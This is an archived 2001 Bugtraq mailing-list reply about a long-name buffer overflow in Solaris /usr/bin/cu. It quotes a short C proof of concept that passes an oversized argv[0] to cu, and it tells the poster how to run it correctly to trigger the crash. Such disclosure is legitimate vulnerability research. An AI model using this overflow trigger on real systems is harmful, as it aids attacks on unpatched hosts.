[18895] in bugtraq
Re: Solaris /usr/bin/cu Vulnerability
daemon@ATHENA.MIT.EDU (optyx)
Tue Jan 30 20:54:01 2001
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.BSO.4.21.0101301154430.6496-100000@pr0n.newhackcity.net>
Date: Tue, 30 Jan 2001 12:01:10 -0800
Reply-To: optyx <optyx@UBERHAX0R.NET>
From: optyx <optyx@UBERHAX0R.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET> wrote:
>Are you implying the above patches fix the cu long hardlink name
>vulnerability? This is not the case, at least on 2.6:
>
> # cat > cu_exploit.c
> #include <stdio.h>
>
> void main(int argc,char **argv)
> {
> char *buf;
>
> buf = (char *) malloc(atoi(argv[1])*sizeof(char));
> memset(buf,0x41,atoi(argv[1])-1);
> buf[atoi(argv[1])-1]=0;
> execl("/usr/bin/cu",buf,(char *)0);
> }
> # gcc cu_exploit.c
> cu_exploit.c: In function `main':
> cu_exploit.c:4: warning: return type of `main' is not `int'
> # a.out
> Segmentation fault
see that atoi(argv[1])? a.out crashed not /usr/bin/cu. try a.out 4000 or
whatever number next time, or trace through it with gdb.
-Optyx, Uberhax0r Communications
http://www.uberhax0r.net, leeter than dog
